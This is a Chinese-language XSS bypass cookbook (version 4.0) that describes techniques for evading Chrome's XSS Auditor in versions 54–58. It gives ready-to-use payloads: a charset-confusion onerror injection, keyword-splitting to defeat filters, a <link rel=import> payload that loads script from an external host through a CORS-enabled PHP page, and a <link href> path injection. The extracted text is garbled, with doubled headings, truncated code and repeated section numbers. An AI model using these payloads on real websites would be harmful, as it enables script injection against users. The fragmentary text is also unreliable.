xss_bypass_cookbook_4.0.pdf.zip_XSS

XSS Bypass Cookbook ver 4.0

XSS Bypass CookbookXSS Bypass Cookbook

[+] Author: math1as

[+] Team: L team

#1 引言#1 引言

在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。

因此也引发了不少安全爱好者和专业工程师的研究。

而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。

从@masatoki处收录了一个chrome xss auditor bypass从@masatoki处收录了一个chrome xss auditor bypass

增加了部分技巧增加了部分技巧

#1.1 研究范围#1.1 研究范围

XSS在各种具体业务场景下的应用和绕过

#1.2 测试环境#1.2 测试环境

在本文所叙述的测试环境中,用到的浏览器版本如下:

chrome 54.0 / firefox 50.0 均为当前的最新发行版本

ie系列由于精力有限未能进行测试

正文中所有以x=开头的payload,均是在这个输出环境下测试的,代码如下

<input value="<?php

#2 Bypass Chrome XSS Auditor#2 Bypass Chrome XSS Auditor

反射型XSS作为最容易发现和挖掘的一种XSS,活跃了非常久的时间。

但是到现在它的作用已经被逐步的弱化

特别是浏览器,比如chrome自身的xss auditor在其中扮演了非常重要的角色

它通过直接检查了输入的内容,判断其是否在输出中出现。

(当然,基本是针对'危险标签'和可能导致javascript执行的地方)

如果符合其过滤条件,那么将直接阻止脚本的执行,比如给出这样的提示

因此给反射XSS带来了不小的难度,但是它就真的那么坚固而不可挑战么?

让我们来从各个方面对它进行逐步的分析吧

本文里所提到的auditor bypass

<meta charset="ISO-2022-JP"><img src="#" onerror%1B28B=alert(1) />

在chrome 58中,直接使用%1B%28B会遭到拦截在chrome 58中,直接使用%1B%28B会遭到拦截

因此需要使用%1B(B 使其混淆后使用因此需要使用%1B(B 使其混淆后使用

这其实是利用了浏览器处理字符集时产生的问题。

目前的chrome 54/55仍然没有进行修复

随着以后字符集的更新,这种问题仍然有可能出现。

#2.2 过滤关键字造成的bypass#2.2 过滤关键字造成的bypass

在我们的xss测试过程中,可能最不喜欢的就是各类过滤了,它给我们xss带来了很大的难度

但是在特定场合,它却能起到让我们绕过auditor的作用

chrome的xss auditor主要基于如下规则(这种描述也许比较粗糙)

if(stripos($content,"<script>")===false) break;

$content=str_replace("<script>","",$content);

}

<img alt="<?php echo $content;?>">

如果我们用<script>分割掉敏感的事件,那么我们的输入在经过auditor检查的时候,就被放行了。

而真正打印内容进行渲染的时候,由于$content中的<script>被过滤,因此我们的xss脚本成功的执行了

用这种方法,成功的绕过了xss auditor

那么它是否可以被用在直接输出的反射XSS中呢?那么它是否可以被用在直接输出的反射XSS中呢?

我们把这个输出点的代码改成如下:

<?php

echo $content;

?>

事实证明,这种方法是完全可行的

#2.3 协议理解产生的bypass#2.3 协议理解产生的bypass

chrome的xss auditor 在检查加载脚本的路径时,有一个比较有趣的地方

如果加载的脚本在自身目录下,那么如果xss的输出点在html属性中如果xss的输出点在html属性中

auditor是不会对其进行拦截的

但是如果检测到了 // 这样的外部链接的话,就会触发auditor无法加载外部脚本

这时就有一个小细节了,在加载其他脚本时 如果我们输入了的链接使用了http: 而没有带上 // 的话

它会仍然被视为在这个目录下,比如我们构造payload

因此,像<script src="evil" ></script> 这样需要闭合的脚本就不能使用了

接下来的问题就是,既然不能用"闭合,也就意味着我们的链接最后始终会带有一个"

并且,由于加载外部文档会触发CROS,所以我们需要设置其header来允许访问

因此,我们在.htaccess新建一条url转发

RewriteRule 1.\"$ /xss/t1.php

并在t1.php中写入如下代码

<?php

header("Access-Control-Allow-Origin:*");

echo "<script>alert(1)</script>";

?>

<body>

<?php

$content=$_GET['x'];

echo $content;

?>

</body>

这时我们使用如下payload

x=<link%20rel="import"%20href=https:www.math1as.com/

那么,很显然的,这个payload是一个无条件的chrome auditor bypass,适用于最新版chrome 54/55那么,很显然的,这个payload是一个无条件的chrome auditor bypass,适用于最新版chrome 54/55

这个payload由原作者发现后,认为是一个输出在属性中的bypass,而在我和phithon复现后,发现其实是无视条件直接触发

当然这里需要说明是的对于firefox来说它是不会分辨mimetype的,但是chrome就会进行校验。

因此,很遗憾的,我们的<embed>不能使用在这里。

#2.5 <link>标签中的href属性导致的绕过#2.5 <link>标签中的href属性导致的绕过

from @masatoki

在link标签中输入正常的路径后,在末尾插入<script>标签,产生了绕过的效果

<link rel=import href="/bypass/path/<script>alert(1)</script>">

在chrome 58下复现成功

#2.5 <param>标签导致的绕过#2.5 <param>标签导致的绕过

在chrome的源码HTMLObjectElement.cpp 文件中,有如下的定义

if (url.isEmpty() && urlParameter.isEmpty() &&

成功绕过